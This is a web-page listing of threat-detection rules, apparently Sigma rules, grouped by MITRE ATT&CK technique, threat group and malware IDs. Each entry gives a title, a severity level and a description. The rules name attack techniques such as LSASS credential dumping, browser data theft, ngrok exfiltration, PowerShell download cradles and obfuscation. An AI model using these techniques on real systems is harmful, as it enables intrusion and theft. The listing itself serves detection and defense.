  • Use of W32tm as Timer - Level: high
    Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
attack.t1187 3
  • Potential PetitPotam Attack Via EFS RPC Calls - Level: medium
    Description: Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. Usage of this RPC function should be rare, if it is used at all; it is uncommon enough that any usage should warrant further investigation to determine whether it is legitimate. View surrounding logs (within a few minutes before and after) from the source IP. Logs from the source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.
  • Possible PetitPotam Coerce Authentication Attempt - Level: high
    Description: Detect PetitPotam coerced authentication activity.
  • PetitPotam Suspicious Kerberos TGT Request - Level: high
    Description: Detects suspicious Kerberos TGT requests. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts.
attack.t1200 3
  • USB Device Plugged - Level: low
    Description: Detects plugged/unplugged USB devices
  • Device Installation Blocked - Level: medium
    Description: Detects an installation of a device that is forbidden by the system policy
  • External Disk Drive Or USB Storage Device Was Recognized By The System - Level: low
    Description: Detects external disk drives or plugged-in USB devices.
attack.t1134 3
  • HackTool - NoFilter Execution - Level: high
    Description: Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Detection of Possible Rotten Potato - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
attack.t1554 3
  • HybridConnectionManager Service Installation - Level: high
    Description: Rule to detect the Hybrid Connection Manager service installation.
  • HybridConnectionManager Service Running - Level: high
    Description: Rule to detect the Hybrid Connection Manager service running on an endpoint.
  • DNS HybridConnectionManager Service Bus - Level: high
    Description: Detects Azure Hybrid Connection Manager services querying the Azure service bus service
attack.t1217 3
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell - Level: low
    Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
  • File And SubFolder Enumeration Via Dir Command - Level: low
    Description: Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
  • Suspicious Where Execution - Level: low
    Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
attack.t1176 3
  • Chromium Browser Instance Executed With Custom Extension - Level: medium
    Description: Detects a Chromium-based browser process with the 'load-extension' flag to start an instance with a custom extension
  • Suspicious Chromium Browser Instance Executed With Custom Extension - Level: high
    Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
attack.s0349 2
  • Credential Dumping by LaZagne - Level: critical
    Description: Detects LSASS process access by LaZagne for credential dumping.
  • Credential Dumping Activity By Python Based Tool - Level: high
    Description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
attack.g0035 2
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin activity as described by the NCSC
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
attack.g0007 2
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
attack.g0045 2
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
attack.s0404 2
  • Suspicious Esentutl Use - Level: high
    Description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Detects the copying of files with well-known filenames (sensitive files containing credential data)
attack.t1609 2
  • Potential Remote Command Execution In Pod Container - Level: medium
    Description: Detects attempts to execute remote commands within a Pod's container, e.g. using the "kubectl exec" command.
  • Potential Sidecar Injection Into Running Deployment - Level: medium
    Description: Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container into a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster.
attack.t1611 2
  • Container With A hostPath Mount Created - Level: low
    Description: Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.
  • Privileged Container Deployed - Level: low
    Description: Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attack. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configuration, etc., as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields.
attack.t1588 2
  • Antivirus Relevant File Paths Alerts - Level: high
    Description: Detects an antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Relevant Anti-Virus Signature Keywords In Application Log - Level: high
    Description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
attack.t1580 2
  • Potential Bucket Enumeration on AWS - Level: low
    Description: Looks for potential enumeration of AWS buckets via ListBuckets.
  • Potential Backup Enumeration on AWS - Level: medium
    Description: Detects potential enumeration activity targeting AWS instance backups
attack.t1589 2
  • Azure AD Account Credential Leaked - Level: high
    Description: Indicates that the user's valid credentials have been leaked.
  • SSHD Error Message CVE-2018-15473 - Level: medium
    Description: Detects exploitation attempt using public exploit code for CVE-2018-15473
attack.t1621 2
  • Multifactor Authentication Denied - Level: medium
    Description: The user has indicated they did not initiate the MFA prompt, which could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
attack.t1586 2
  • Bitbucket Unauthorized Access To A Resource - Level: critical
    Description: Detects unauthorized access attempts to a resource.
  • Bitbucket Unauthorized Full Data Export Triggered - Level: critical
    Description: Detects when a full data export is attempted by an unauthorized user.
attack.t1074 2
  • Google Full Network Traffic Packet Capture - Level: medium
    Description: Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.
  • Cisco Stage Data - Level: low
    Description: Various protocols may be used to stage data on the device for exfiltration or infiltration
attack.t1030 2
  • Split A File Into Pieces - Linux - Level: low
    Description: Detects use of the "split" command to split files into parts for possible transfer.
  • Split A File Into Pieces - Level: low
    Description: Detects use of the "split" command to split files into parts for possible transfer.
attack.s0508 2
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
attack.t1590 2
  • PUA - Advanced IP/Port Scanner Update Check - Level: medium
    Description: Detect the update check performed by Advanced IP/Port Scanner utilities.
  • Suspicious DNS Query for IP Lookup Service APIs - Level: medium
    Description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process.
attack.t1056 2
  • Suspicious Network Communication With IPFS - Level: low
    Description: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.
  • DNS Query Request To OneLaunch Update Service - Level: low
    Description: Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.
attack.t1221 2
  • Server Side Template Injection Strings - Level: high
    Description: Detects SSTI attempts sent via GET requests in access logs
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190) - Level: medium
    Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
attack.t1207 2
  • Add or Remove Computer from DC - Level: low
    Description: Detects the creation or removal of a computer account. Can be used to detect attacks such as DCShadow via the creation of a new SPN.
  • Possible DC Shadow Attack - Level: medium
    Description: Detects DCShadow via the creation of a new SPN
attack.s0039 2
  • Reconnaissance Activity - Level: high
    Description: Detects activity such as "net user administrator /domain" and "net group domain admins /domain"
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1039 2
  • Suspicious Access to Sensitive File Extensions - Level: medium
    Description: Detects known sensitive file extensions accessed on a network share
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
attack.g0091 2
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1620 2
  • Potential In-Memory Execution Using Reflection.Assembly - Level: medium
    Description: Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
attack.t1222 2
  • PowerShell Script Change Permission Via Set-Acl - PsScript - Level: low
    Description: Detects PowerShell scripts that set the ACL of a file or a folder
  • PowerShell Set-Acl On Windows Folder - PsScript - Level: high
    Description: Detects PowerShell scripts that set the ACL of a file in the Windows folder
attack.t1120 2
  • Powershell Suspicious Win32_PnPEntity - Level: low
    Description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.
  • Fsutil Drive Enumeration - Level: low
    Description: Attackers may leverage fsutil to enumerate connected drives.
attack.t1185 2
  • Potential Data Stealing Via Chromium Headless Debugging - Level: high
    Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
  • Browser Started with Remote Debugging - Level: medium
    Description: Detects browsers starting with the remote debugging flags, which is a technique often used to perform browser injection attacks
attack.s0108 2
  • Firewall Disabled via Netsh.EXE - Level: medium
    Description: Detects netsh commands that turn off the Windows firewall
  • Potential Persistence Via Netsh Helper DLL - Level: medium
    Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
attack.t1595 2
  • PUA - PingCastle Execution - Level: medium
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
  • PUA - PingCastle Execution From Potentially Suspicious Parent - Level: high
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
attack.t1539 2
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • SQLite Firefox Profile Data DB Access - Level: high
    Description: Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
attack.t1608 2
  • Suspicious Download from Office Domain - Level: high
    Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
  • HybridConnectionManager Service Installation - Registry - Level: high
    Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from an Azure function.
attack.t1006 2
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools - Level: low
    Description: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts
  • Use of Debugfs to Access a Raw Disk - Level: medium
    Description: Detects access to a raw disk on a host to evade detection by security products.
attack.g0044 2
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
attack.g0125 2
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
attack.t1499 2
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
  • Multiple Modsecurity Blocks - Level: medium
    Description: Detects multiple blocks by the mod_security module (Web Application Firewall)
attack.s0003 1
  • Edit of .bash_profile and .bashrc - Level: medium
    Description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
attack.g0016 1
  • APT29 - Level: high
    Description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
attack.s0160 1
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
attack.g0075 1
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
attack.g0096 1
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
attack.g0009 1
  • Hurricane Panda Activity - Level: high
    Description: Detects Hurricane Panda activity
attack.g0092 1
  • TA505 Dropper Load Pattern - Level: critical
    Description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
attack.t1086 1
  • PowerShell Execution - Level: medium
    Description: Detects execution of PowerShell
attack.t1525 1
  • AWS ECS Task Definition That Queries The Credential Endpoint - Level: medium
    Description: Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
attack.t1578 1
  • Azure Active Directory Hybrid Health AD FS New Server - Level: medium
    Description: This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
attack.t1484 1
  • Changes to Device Registration Policy - Level: high
    Description: Monitors and alerts on changes to the device registration policy.
attack.t1606 1
  • SAML Token Issuer Anomaly - Level: high
    Description: Indicates that the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns.
attack.t1199 1
  • Microsoft 365 - User Restricted from Sending Email - Level: medium
    Description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
attack.t1014 1
Show Rules (1)
  • Triple Cross eBPF Rootkit Install Commands - Level: high
    Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
attack.s0482 1
Show Rules (1)
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
attack.s0402 1
Show Rules (1)
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
attack.t1495 1
Show Rules (1)
  • Cisco Denial of Service - Level: medium
    Description: Detects a system being shut down or put into a different boot mode
attack.t1505 1
Show Rules (1)
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
attack.s0154 1
Show Rules (1)
  • Default Cobalt Strike Certificate - Level: high
    Description: Detects the presence of the default Cobalt Strike certificate in HTTPS traffic
attack.t1568 1
Show Rules (1)
  • Download from Suspicious Dyndns Hosts - Level: medium
    Description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
attack.t1091 1
Show Rules (1)
  • External Disk Drive Or USB Storage Device Was Recognized By The System - Level: low
    Description: Detects external disk drives or plugged-in USB devices.
attack.t1010 1
Show Rules (1)
  • SCM Database Handle Failure - Level: medium
    Description: Detects non-system users failing to get a handle of the SCM database.
attack.s0195 1
Show Rules (1)
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
attack.t1195 1
Show Rules (1)
  • Octopus Scanner Malware - Level: high
    Description: Detects Octopus Scanner Malware.
attack.s0363 1
Show Rules (1)
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report
attack.g0080 1
Show Rules (1)
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
attack.s0106 1
Show Rules (1)
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
attack.s0040 1
Show Rules (1)
  • HackTool - Htran/NATBypass Execution - Level: high
    Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
attack.g0022 1
Show Rules (1)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
attack.g0060 1
Show Rules (1)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
attack.s0246 1
Show Rules (1)
  • New Firewall Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the addition of a new rule to the Windows firewall via netsh
attack.t1104 1
Show Rules (1)
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
attack.t1622 1
Show Rules (1)
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
attack.s0592 1
Show Rules (1)
  • Renamed Remote Utilities RAT (RURAT) Execution - Level: medium
    Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
attack.g0047 1
Show Rules (1)
  • Suspicious UltraVNC Execution - Level: high
    Description: Detects suspicious UltraVNC command line flag combinations that indicate an auto reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)
attack.t1125 1
Show Rules (1)
  • Suspicious Camera and Microphone Access - Level: high
    Description: Detects processes accessing the camera and microphone from a suspicious folder
attack.s0412 1
Show Rules (1)
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
attack.g0001 1
Show Rules (1)
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
attack.s0013 1
Show Rules (1)
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
attack.g0064 1
Show Rules (1)
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service described in the StoneDrill report by Kaspersky
attack.g0030 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.g0050 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.s0081 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.g0027 1
Show Rules (1)
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
attack.g0128 1
Show Rules (1)
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
attack.g0093 1
Show Rules (1)
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
attack.t1559 1
Show Rules (1)
  • Trickbot Malware Activity - Level: high
    Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
attack.g0004 1
Show Rules (1)
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
attack.s0575 1
Show Rules (1)
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
attack.g0115 1
Show Rules (1)
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
attack.g0129 1
Show Rules (1)
  • Potential APT Mustang Panda Activity Against Australian Gov - Level: high
    Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
attack.s0075 1
Show Rules (1)
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Remote registry management using REG utility from non-admin workstation
attack.t1592 1
Show Rules (1)
  • Account Enumeration on AWS - Level: low
    Description: Detects enumeration of account configuration via API calls that list different instances and services within a short period of time.
attack.t1619 1
Show Rules (1)
  • Potential Storage Enumeration on AWS - Level: medium
    Description: Detects potential enumeration activity targeting AWS storage
attack.t1043 1
Show Rules (1)
  • Possible DNS Rebinding - Level: medium
    Description: Detects DNS answers with a TTL below 10.
attack.t1035 1
Show Rules (1)
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
attack.t1050 1
Show Rules (1)
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

Top MITRE Sub-Techniques

Sub-Technique   Count   Rule Title   Count Bar
attack.t1059.001 236
Show Rules (236)
  • Alternate PowerShell Hosts - Image - Level: low
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • Suspicious CLR Logs Creation - Level: high
    Description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
  • Dnscat Execution - Level: critical
    Description: Dnscat exfiltration tool execution
  • Suspicious PowerShell Download - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • APT29 - Level: high
    Description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Base64 Encoded Listing of Shadowcopy - Level: high
    Description: Detects base64 encoded listing Win32_Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets - Level: high
    Description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
  • Potential Xor Encoded PowerShell Command - Level: medium
    Description: Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection
  • PowerShell Execution - Level: medium
    Description: Detects execution of PowerShell
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • File Was Not Allowed To Run - Level: medium
    Description: Detects execution of files that are not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • Invoke-Obfuscation CLIP+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Security - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Security - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Security - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Security - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Remote PowerShell Sessions Network Connections (WinRM) - Level: high
    Description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
  • Invoke-Obfuscation CLIP+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - System - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation Via Stdin - System - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation RUNDLL LAUNCHER - System - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Clip - System - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - System - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - System - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Remote Thread Creation Via PowerShell In Uncommon Target - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process in an uncommon target process
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Scripts - FileCreation - Level: high
    Description: Detects the creation of known offensive powershell scripts used for exploitation
  • Suspicious Interactive PowerShell as SYSTEM - Level: high
    Description: Detects the creation of files that indicate an interactive use of PowerShell in the SYSTEM user context
  • PowerShell Core DLL Loaded By Non PowerShell Process - Level: medium
    Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
  • Suspicious WSMAN Provider Image Loads - Level: medium
    Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
  • Potential Remote PowerShell Session Initiated - Level: high
    Description: Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicate a remote PowerShell connection.
  • Alternate PowerShell Hosts Pipe - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • New PowerShell Instance Created - Level: informational
    Description: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost
  • Nslookup PowerShell Download Cradle - Level: medium
    Description: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
  • PowerShell Downgrade Attack - PowerShell - Level: medium
    Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
  • PowerShell Called from an Executable Version Mismatch - Level: high
    Description: Detects PowerShell called from an executable by the version mismatch method
  • Remote PowerShell Session (PS Classic) - Level: low
    Description: Detects remote PowerShell sessions
  • Renamed Powershell Under Powershell Channel - Level: low
    Description: Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
  • Suspicious PowerShell Download - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious Non PowerShell WSMAN COM Provider - Level: medium
    Description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
  • Alternate PowerShell Hosts - PowerShell Module - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • Bad Opsec Powershell Code Artifacts - Level: critical
    Description: Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, PowerView, Letmein, Empire, PowerSploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
  • Malicious PowerShell Scripts - PoshModule - Level: high
    Description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
